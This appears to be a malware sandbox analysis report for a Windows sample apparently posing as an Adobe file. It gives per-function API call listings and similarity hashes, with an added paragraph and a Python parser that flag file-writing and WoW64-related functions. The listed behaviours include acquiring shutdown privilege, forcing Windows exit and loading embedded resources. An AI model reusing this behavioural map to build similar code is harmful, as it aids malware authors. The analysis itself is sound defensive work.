  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_adobe.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
Uniqueness
• Uniqueness Score: -1.00%

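The per-function "APIs" listings above share one line format: a direct call is printed as `Name.MODULE(values), ref: address`, and a call reached through a callee is indented and prefixed with `Part of subcall function <address>:`. Two things are easy to misread in that format. First, Joe Sandbox prints stack slots past the callee's real parameter count, so the `kernel32.dll` / `Wow64DisableWow64FsRedirection` / `Wow64RevertWow64FsRedirection` strings in the FormatMessageA entry at 004072A3 are stack context at the call site (FormatMessageA takes seven parameters), not arguments FormatMessageA received; they are still evidence that the surrounding code handles WoW64 file-system redirection. Second, the CreateFileA, SetFilePointer, WriteFile and SetEndOfFile entries are separate functions in the listing, and only grouping them shows a file-writing routine. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses listing lines copied from this page, splits each call's printed values into real parameters and stack context using the documented Win32 parameter counts, and flags the functions that write files or reference WoW64 redirection. `PARAM_COUNTS` and `FILE_WRITE_APIS` are this example's own tables; `REPORT_EXCERPT` is copied verbatim from the entries above, reduced to five blocks.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and summarise what each
function touches. Added example; not Joe Sandbox or sample code."""
import re

# One call line: "Name.MODULE(value,value,...), ref: 0040XXXX"
API_RE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<func>[0-9A-Fa-f]{8}):\s*(?P<rest>.*)")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented parameter counts of the Win32 APIs in this report (example's own table).
# Joe Sandbox prints stack slots beyond these, so the remainder is call-site stack
# context, not an argument the API received.
PARAM_COUNTS = {
    "FormatMessageA": 7, "CreateFileA": 7, "WriteFile": 5, "SetFilePointer": 4,
    "SetEndOfFile": 1, "GetLastError": 0, "GetFileAttributesA": 1,
    "GetSystemDefaultLCID": 0, "LoadStringA": 4, "GetLocaleInfoA": 4,
}
# Classification set chosen for this example: APIs that together make up a file writer.
FILE_WRITE_APIS = {"CreateFileA", "WriteFile", "SetEndOfFile", "SetFilePointer"}


def parse_api_blocks(text):
    """Return one list of call dicts per 'APIs' block; a block ends at the
    'Memory Dump Source' heading that follows it in the report."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line == "Memory Dump Source":
            current = None
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("• ")
        caller = None
        sub = SUBCALL_RE.match(body)
        if sub:  # indented entry: API reached through a callee of this function
            caller, body = sub.group("func"), sub.group("rest")
        m = API_RE.match(body)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        current.append({"name": m.group("name"), "module": m.group("module"),
                        "args": args, "ref": m.group("ref"), "subcall_of": caller})
    return blocks


def split_params(call):
    """Split a call's printed values into (real parameters, stack context)."""
    n = PARAM_COUNTS.get(call["name"], len(call["args"]))
    return call["args"][:n], call["args"][n:]


def string_args(block):
    """Printed values that are neither 8-hex-digit numbers nor '?' placeholders:
    file names, DLL names and export names sitting on the stack near the call."""
    return [a for c in block for a in c["args"] if a and a != "?" and not HEX8_RE.match(a)]


def block_address(block):
    """Label a function by the address of its first direct call."""
    return next((c["ref"] for c in block if c["subcall_of"] is None), None)


def summarise(text):
    """Which listed functions write files, and which reference WoW64 redirection."""
    blocks = parse_api_blocks(text)
    file_write, wow64 = [], []
    for b in blocks:
        direct = {c["name"] for c in b if c["subcall_of"] is None}
        if direct & FILE_WRITE_APIS:
            file_write.append(block_address(b))
        if any("Wow64" in s for s in string_args(b)):
            wow64.append(block_address(b))
    return {"blocks": len(blocks), "file_write": file_write, "wow64": wow64}


# Five of the entries above, copied from the report, as the parser sees them.
REPORT_EXCERPT = """
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
  • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
Memory Dump Source
"""

if __name__ == "__main__":
    print(summarise(REPORT_EXCERPT))
    fm = [c for b in parse_api_blocks(REPORT_EXCERPT) for c in b if c["name"] == "FormatMessageA"][0]
    print(split_params(fm))
```

Run against the excerpt, `summarise` reports five blocks, three file-writing functions (004075DB, 004075B8, 004076DF) and one WoW64-referencing function (004072A3); `split_params` on the FormatMessageA call returns the seven real parameters and nine trailing stack values, the Wow64 export names among the latter. The same parser works on the full function listing of a report if the text is pasted in, since every entry uses the same `APIs` / `Memory Dump Source` framing.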
                                                                                                                                                          APIs
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,02297D68,0040A08C,00000000), ref: 004076B3
                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 734332943-0
                                                                                                                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                                                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SystemTime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2656138-0
                                                                                                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Version
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
